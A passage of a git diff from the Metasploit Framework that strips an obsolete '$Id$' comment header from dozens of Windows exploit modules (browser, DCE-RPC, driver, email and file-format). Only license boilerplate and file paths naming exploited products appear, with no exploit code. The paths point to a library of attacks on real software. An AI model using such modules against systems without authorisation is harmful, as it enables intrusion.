a/modules/exploits/windows/browser/realplayer_qcp.rb +++ b/modules/exploits/windows/browser/realplayer_qcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/realplayer_smil.rb b/modules/exploits/windows/browser/realplayer_smil.rb index dca74fb029..18946b8a4e 100644 --- a/modules/exploits/windows/browser/realplayer_smil.rb +++ b/modules/exploits/windows/browser/realplayer_smil.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/roxio_cineplayer.rb b/modules/exploits/windows/browser/roxio_cineplayer.rb index 3a63920525..5eb1818ae8 100644 --- a/modules/exploits/windows/browser/roxio_cineplayer.rb +++ b/modules/exploits/windows/browser/roxio_cineplayer.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/safari_xslt_output.rb b/modules/exploits/windows/browser/safari_xslt_output.rb index e67ba8b8ea..b0bfec4d8e 100644 --- a/modules/exploits/windows/browser/safari_xslt_output.rb +++ b/modules/exploits/windows/browser/safari_xslt_output.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/sapgui_saveviewtosessionfile.rb b/modules/exploits/windows/browser/sapgui_saveviewtosessionfile.rb index 91bd63536e..0df40e2d01 100644 --- a/modules/exploits/windows/browser/sapgui_saveviewtosessionfile.rb +++ b/modules/exploits/windows/browser/sapgui_saveviewtosessionfile.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/softartisans_getdrivename.rb b/modules/exploits/windows/browser/softartisans_getdrivename.rb index b08aa431b5..65746019e0 100644 --- a/modules/exploits/windows/browser/softartisans_getdrivename.rb +++ b/modules/exploits/windows/browser/softartisans_getdrivename.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/sonicwall_addrouteentry.rb b/modules/exploits/windows/browser/sonicwall_addrouteentry.rb index aeb9976a44..339e21bf2b 100644 --- a/modules/exploits/windows/browser/sonicwall_addrouteentry.rb +++ b/modules/exploits/windows/browser/sonicwall_addrouteentry.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/symantec_altirisdeployment_downloadandinstall.rb b/modules/exploits/windows/browser/symantec_altirisdeployment_downloadandinstall.rb index 9e7140bd2f..ab55aa79ba 100644 --- a/modules/exploits/windows/browser/symantec_altirisdeployment_downloadandinstall.rb +++ b/modules/exploits/windows/browser/symantec_altirisdeployment_downloadandinstall.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/symantec_altirisdeployment_runcmd.rb b/modules/exploits/windows/browser/symantec_altirisdeployment_runcmd.rb index 4dd6f0fee7..ba111f6118 100644 --- a/modules/exploits/windows/browser/symantec_altirisdeployment_runcmd.rb +++ b/modules/exploits/windows/browser/symantec_altirisdeployment_runcmd.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/symantec_appstream_unsafe.rb b/modules/exploits/windows/browser/symantec_appstream_unsafe.rb index 7eff754f6e..a27a17e17a 100644 --- a/modules/exploits/windows/browser/symantec_appstream_unsafe.rb +++ b/modules/exploits/windows/browser/symantec_appstream_unsafe.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/symantec_backupexec_pvcalendar.rb b/modules/exploits/windows/browser/symantec_backupexec_pvcalendar.rb index 5bcb037e8e..2151eef80d 100644 --- a/modules/exploits/windows/browser/symantec_backupexec_pvcalendar.rb +++ b/modules/exploits/windows/browser/symantec_backupexec_pvcalendar.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/symantec_consoleutilities_browseandsavefile.rb b/modules/exploits/windows/browser/symantec_consoleutilities_browseandsavefile.rb index baa125cc07..5adc79b03d 100644 --- a/modules/exploits/windows/browser/symantec_consoleutilities_browseandsavefile.rb +++ b/modules/exploits/windows/browser/symantec_consoleutilities_browseandsavefile.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb b/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb index e251f12c07..87d11c7c66 100644 --- a/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb +++ b/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/teechart_pro.rb b/modules/exploits/windows/browser/teechart_pro.rb index cc71e7c0d4..470b883ae8 100644 --- a/modules/exploits/windows/browser/teechart_pro.rb +++ b/modules/exploits/windows/browser/teechart_pro.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ### # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/trendmicro_extsetowner.rb b/modules/exploits/windows/browser/trendmicro_extsetowner.rb index d319f1ec8a..815ea5b172 100644 --- a/modules/exploits/windows/browser/trendmicro_extsetowner.rb +++ b/modules/exploits/windows/browser/trendmicro_extsetowner.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/trendmicro_officescan.rb b/modules/exploits/windows/browser/trendmicro_officescan.rb index e6f4da6fb2..84678cd33d 100644 --- a/modules/exploits/windows/browser/trendmicro_officescan.rb +++ b/modules/exploits/windows/browser/trendmicro_officescan.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/tumbleweed_filetransfer.rb b/modules/exploits/windows/browser/tumbleweed_filetransfer.rb index d4ccb2e5c2..1230d7112b 100644 --- a/modules/exploits/windows/browser/tumbleweed_filetransfer.rb +++ b/modules/exploits/windows/browser/tumbleweed_filetransfer.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/ultraoffice_httpupload.rb b/modules/exploits/windows/browser/ultraoffice_httpupload.rb index 10b501169d..ae98bbfc77 100644 --- a/modules/exploits/windows/browser/ultraoffice_httpupload.rb +++ b/modules/exploits/windows/browser/ultraoffice_httpupload.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/verypdf_pdfview.rb b/modules/exploits/windows/browser/verypdf_pdfview.rb index 0101154ea6..b42325c7a3 100644 --- a/modules/exploits/windows/browser/verypdf_pdfview.rb +++ b/modules/exploits/windows/browser/verypdf_pdfview.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/vlc_amv.rb b/modules/exploits/windows/browser/vlc_amv.rb index b934a25879..d21215e30f 100644 --- a/modules/exploits/windows/browser/vlc_amv.rb +++ b/modules/exploits/windows/browser/vlc_amv.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/webdav_dll_hijacker.rb b/modules/exploits/windows/browser/webdav_dll_hijacker.rb index 663f51bb06..3195cb1ece 100644 --- a/modules/exploits/windows/browser/webdav_dll_hijacker.rb +++ b/modules/exploits/windows/browser/webdav_dll_hijacker.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/webex_ucf_newobject.rb b/modules/exploits/windows/browser/webex_ucf_newobject.rb index 6e623274e4..0b6cdf8372 100644 --- a/modules/exploits/windows/browser/webex_ucf_newobject.rb +++ b/modules/exploits/windows/browser/webex_ucf_newobject.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/winamp_playlist_unc.rb b/modules/exploits/windows/browser/winamp_playlist_unc.rb index 7b8ebfa080..e543a4755c 100644 --- a/modules/exploits/windows/browser/winamp_playlist_unc.rb +++ b/modules/exploits/windows/browser/winamp_playlist_unc.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/winamp_ultravox.rb b/modules/exploits/windows/browser/winamp_ultravox.rb index 611dd437ad..52011a0872 100644 --- a/modules/exploits/windows/browser/winamp_ultravox.rb +++ b/modules/exploits/windows/browser/winamp_ultravox.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/windvd7_applicationtype.rb b/modules/exploits/windows/browser/windvd7_applicationtype.rb index f46f569d83..6ffe0c2220 100644 --- a/modules/exploits/windows/browser/windvd7_applicationtype.rb +++ b/modules/exploits/windows/browser/windvd7_applicationtype.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/winzip_fileview.rb b/modules/exploits/windows/browser/winzip_fileview.rb index 263aae89bb..ab339479b0 100644 --- a/modules/exploits/windows/browser/winzip_fileview.rb +++ b/modules/exploits/windows/browser/winzip_fileview.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/wmi_admintools.rb b/modules/exploits/windows/browser/wmi_admintools.rb index d3304956d8..b7ca072f91 100644 --- a/modules/exploits/windows/browser/wmi_admintools.rb +++ b/modules/exploits/windows/browser/wmi_admintools.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/xmplay_asx.rb b/modules/exploits/windows/browser/xmplay_asx.rb index 0ff06b7f33..a9695b3be8 100644 --- a/modules/exploits/windows/browser/xmplay_asx.rb +++ b/modules/exploits/windows/browser/xmplay_asx.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/yahoomessenger_fvcom.rb b/modules/exploits/windows/browser/yahoomessenger_fvcom.rb index 060e784c55..8a6fc34f75 100644 --- a/modules/exploits/windows/browser/yahoomessenger_fvcom.rb +++ b/modules/exploits/windows/browser/yahoomessenger_fvcom.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/yahoomessenger_server.rb b/modules/exploits/windows/browser/yahoomessenger_server.rb index 5936f11f06..d58c7d5bd3 100644 --- a/modules/exploits/windows/browser/yahoomessenger_server.rb +++ b/modules/exploits/windows/browser/yahoomessenger_server.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb b/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb index 18f7d8171a..e129824fed 100644 --- a/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb +++ b/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/dcerpc/ms03_026_dcom.rb b/modules/exploits/windows/dcerpc/ms03_026_dcom.rb index 1e1845e478..6b1bcb37f5 100644 --- a/modules/exploits/windows/dcerpc/ms03_026_dcom.rb +++ b/modules/exploits/windows/dcerpc/ms03_026_dcom.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/dcerpc/ms05_017_msmq.rb b/modules/exploits/windows/dcerpc/ms05_017_msmq.rb index 5876859957..13491dea41 100644 --- a/modules/exploits/windows/dcerpc/ms05_017_msmq.rb +++ b/modules/exploits/windows/dcerpc/ms05_017_msmq.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/dcerpc/ms07_029_msdns_zonename.rb b/modules/exploits/windows/dcerpc/ms07_029_msdns_zonename.rb index edbe399c94..886a0654de 100644 --- a/modules/exploits/windows/dcerpc/ms07_029_msdns_zonename.rb +++ b/modules/exploits/windows/dcerpc/ms07_029_msdns_zonename.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/dcerpc/ms07_065_msmq.rb b/modules/exploits/windows/dcerpc/ms07_065_msmq.rb index fbd9dc68d2..f8ed6506f2 100644 --- a/modules/exploits/windows/dcerpc/ms07_065_msmq.rb +++ b/modules/exploits/windows/dcerpc/ms07_065_msmq.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/driver/broadcom_wifi_ssid.rb b/modules/exploits/windows/driver/broadcom_wifi_ssid.rb index 0f224d7e45..776a60b1ac 100644 --- a/modules/exploits/windows/driver/broadcom_wifi_ssid.rb +++ b/modules/exploits/windows/driver/broadcom_wifi_ssid.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/driver/dlink_wifi_rates.rb b/modules/exploits/windows/driver/dlink_wifi_rates.rb index abf673b7d5..1c5cd64809 100644 --- a/modules/exploits/windows/driver/dlink_wifi_rates.rb +++ b/modules/exploits/windows/driver/dlink_wifi_rates.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/driver/netgear_wg111_beacon.rb b/modules/exploits/windows/driver/netgear_wg111_beacon.rb index 12ee5cd52a..235e67bece 100644 --- a/modules/exploits/windows/driver/netgear_wg111_beacon.rb +++ b/modules/exploits/windows/driver/netgear_wg111_beacon.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/email/ms07_017_ani_loadimage_chunksize.rb b/modules/exploits/windows/email/ms07_017_ani_loadimage_chunksize.rb index 03f0838979..787530b552 100644 --- a/modules/exploits/windows/email/ms07_017_ani_loadimage_chunksize.rb +++ b/modules/exploits/windows/email/ms07_017_ani_loadimage_chunksize.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb b/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb index 3207600ac7..3889b589a2 100644 --- a/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb +++ b/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/email/ms10_045_outlook_ref_resolve.rb b/modules/exploits/windows/email/ms10_045_outlook_ref_resolve.rb index e999b8060f..49323cefcc 100644 --- a/modules/exploits/windows/email/ms10_045_outlook_ref_resolve.rb +++ b/modules/exploits/windows/email/ms10_045_outlook_ref_resolve.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/emc/alphastor_agent.rb b/modules/exploits/windows/emc/alphastor_agent.rb index c372ae059f..bdad203c18 100644 --- a/modules/exploits/windows/emc/alphastor_agent.rb +++ b/modules/exploits/windows/emc/alphastor_agent.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/a-pdf_wav_to_mp3.rb b/modules/exploits/windows/fileformat/a-pdf_wav_to_mp3.rb index 61e3fc58d2..c3696510a9 100644 --- a/modules/exploits/windows/fileformat/a-pdf_wav_to_mp3.rb +++ b/modules/exploits/windows/fileformat/a-pdf_wav_to_mp3.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/acdsee_fotoslate_string.rb b/modules/exploits/windows/fileformat/acdsee_fotoslate_string.rb index bd3b94f0d4..8e8ff8e80d 100644 --- a/modules/exploits/windows/fileformat/acdsee_fotoslate_string.rb +++ b/modules/exploits/windows/fileformat/acdsee_fotoslate_string.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/acdsee_xpm.rb b/modules/exploits/windows/fileformat/acdsee_xpm.rb index fd007b38a0..f02488fa67 100644 --- a/modules/exploits/windows/fileformat/acdsee_xpm.rb +++ b/modules/exploits/windows/fileformat/acdsee_xpm.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/activepdf_webgrabber.rb b/modules/exploits/windows/fileformat/activepdf_webgrabber.rb index c5891dbe36..0bdbdfbe1b 100644 --- a/modules/exploits/windows/fileformat/activepdf_webgrabber.rb +++ b/modules/exploits/windows/fileformat/activepdf_webgrabber.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/adobe_collectemailinfo.rb b/modules/exploits/windows/fileformat/adobe_collectemailinfo.rb index a980661445..394a0d07f5 100644 --- a/modules/exploits/windows/fileformat/adobe_collectemailinfo.rb +++ b/modules/exploits/windows/fileformat/adobe_collectemailinfo.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/adobe_cooltype_sing.rb b/modules/exploits/windows/fileformat/adobe_cooltype_sing.rb index 2d46f3f602..3878e46a95 100644 --- a/modules/exploits/windows/fileformat/adobe_cooltype_sing.rb +++ b/modules/exploits/windows/fileformat/adobe_cooltype_sing.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/adobe_flashplayer_button.rb b/modules/exploits/windows/fileformat/adobe_flashplayer_button.rb index f8a2e3ff88..747c855396 100644 --- a/modules/exploits/windows/fileformat/adobe_flashplayer_button.rb +++ b/modules/exploits/windows/fileformat/adobe_flashplayer_button.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/adobe_flashplayer_newfunction.rb b/modules/exploits/windows/fileformat/adobe_flashplayer_newfunction.rb index 40eb032384..ce657a6137 100644 --- a/modules/exploits/windows/fileformat/adobe_flashplayer_newfunction.rb +++ b/modules/exploits/windows/fileformat/adobe_flashplayer_newfunction.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/adobe_flatedecode_predictor02.rb b/modules/exploits/windows/fileformat/adobe_flatedecode_predictor02.rb index 5cefb03e8b..0754630ca4 100644 --- a/modules/exploits/windows/fileformat/adobe_flatedecode_predictor02.rb +++ b/modules/exploits/windows/fileformat/adobe_flatedecode_predictor02.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/adobe_geticon.rb b/modules/exploits/windows/fileformat/adobe_geticon.rb index e29479c3d5..822d33e1c3 100644 --- a/modules/exploits/windows/fileformat/adobe_geticon.rb +++ b/modules/exploits/windows/fileformat/adobe_geticon.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/adobe_illustrator_v14_eps.rb b/modules/exploits/windows/fileformat/adobe_illustrator_v14_eps.rb index bea45f5925..042d9371be 100644 --- a/modules/exploits/windows/fileformat/adobe_illustrator_v14_eps.rb +++ b/modules/exploits/windows/fileformat/adobe_illustrator_v14_eps.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/adobe_jbig2decode.rb b/modules/exploits/windows/fileformat/adobe_jbig2decode.rb index e809b3645c..dab5ffee86 100644 --- a/modules/exploits/windows/fileformat/adobe_jbig2decode.rb +++ b/modules/exploits/windows/fileformat/adobe_jbig2decode.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/adobe_libtiff.rb b/modules/exploits/windows/fileformat/adobe_libtiff.rb index 4c99f06168..b7e14f5da4 100644 --- a/modules/exploits/windows/fileformat/adobe_libtiff.rb +++ b/modules/exploits/windows/fileformat/adobe_libtiff.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/adobe_media_newplayer.rb b/modules/exploits/windows/fileformat/adobe_media_newplayer.rb index 89d1ba679f..351e8ce511 100644 --- a/modules/exploits/windows/fileformat/adobe_media_newplayer.rb +++ b/modules/exploits/windows/fileformat/adobe_media_newplayer.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb b/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb index a9fecc52a8..261073536e 100644 --- a/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb +++ b/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe_nojs.rb b/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe_nojs.rb index 2b2731152d..ac39baaf95 100644 --- a/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe_nojs.rb +++ b/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe_nojs.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/adobe_u3d_meshdecl.rb b/modules/exploits/windows/fileformat/adobe_u3d_meshdecl.rb index 7f2991aca8..fc04b7cd5c 100644 --- a/modules/exploits/windows/fileformat/adobe_u3d_meshdecl.rb +++ b/modules/exploits/windows/fileformat/adobe_u3d_meshdecl.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/adobe_utilprintf.rb b/modules/exploits/windows/fileformat/adobe_utilprintf.rb index 1b6c2a65c5..2d05034954 100644 --- a/modules/exploits/windows/fileformat/adobe_utilprintf.rb +++ b/modules/exploits/windows/fileformat/adobe_utilprintf.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/altap_salamander_pdb.rb b/modules/exploits/windows/fileformat/altap_salamander_pdb.rb index 467f250e62..824c124d37 100644 --- a/modules/exploits/windows/fileformat/altap_salamander_pdb.rb +++ b/modules/exploits/windows/fileformat/altap_salamander_pdb.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/aol_desktop_linktag.rb b/modules/exploits/windows/fileformat/aol_desktop_linktag.rb index c2c4a47827..5b8e649847 100644 --- a/modules/exploits/windows/fileformat/aol_desktop_linktag.rb +++ b/modules/exploits/windows/fileformat/aol_desktop_linktag.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/aol_phobos_bof.rb b/modules/exploits/windows/fileformat/aol_phobos_bof.rb index ac2b6874ae..68d3be74a6 100644 --- a/modules/exploits/windows/fileformat/aol_phobos_bof.rb +++ b/modules/exploits/windows/fileformat/aol_phobos_bof.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/apple_quicktime_pnsize.rb b/modules/exploits/windows/fileformat/apple_quicktime_pnsize.rb index e468f92450..3c078bdfbf 100644 --- a/modules/exploits/windows/fileformat/apple_quicktime_pnsize.rb +++ b/modules/exploits/windows/fileformat/apple_quicktime_pnsize.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/audio_wkstn_pls.rb b/modules/exploits/windows/fileformat/audio_wkstn_pls.rb index 3dcb4b4b25..dfcf0cd944 100644 --- a/modules/exploits/windows/fileformat/audio_wkstn_pls.rb +++ b/modules/exploits/windows/fileformat/audio_wkstn_pls.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/audiotran_pls.rb b/modules/exploits/windows/fileformat/audiotran_pls.rb index 4117c613e3..793ce2c331 100644 --- a/modules/exploits/windows/fileformat/audiotran_pls.rb +++ b/modules/exploits/windows/fileformat/audiotran_pls.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/bacnet_csv.rb b/modules/exploits/windows/fileformat/bacnet_csv.rb index 93239bdab6..2960bca19e 100644 --- a/modules/exploits/windows/fileformat/bacnet_csv.rb +++ b/modules/exploits/windows/fileformat/bacnet_csv.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/fileformat/blazedvd_plf.rb b/modules/exploits/windows/fileformat/blazedvd_plf.rb index 140e718cb1..eb640a2176 100644 --- a/modules/exploits/windows/fileformat/blazedvd_plf.rb +++ b/modules/exploits/windows/fileformat/blazedvd_plf.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may 